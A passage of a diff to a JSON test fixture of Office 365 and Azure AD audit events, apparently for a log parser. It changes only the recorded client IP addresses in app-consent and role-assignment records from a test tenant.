Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -8220,9 +8220,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:05", "ExtendedProperties": [ { @@ -8456,7 +8456,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -8486,9 +8486,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:06", "ExtendedProperties": [ { @@ -8723,7 +8723,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"Co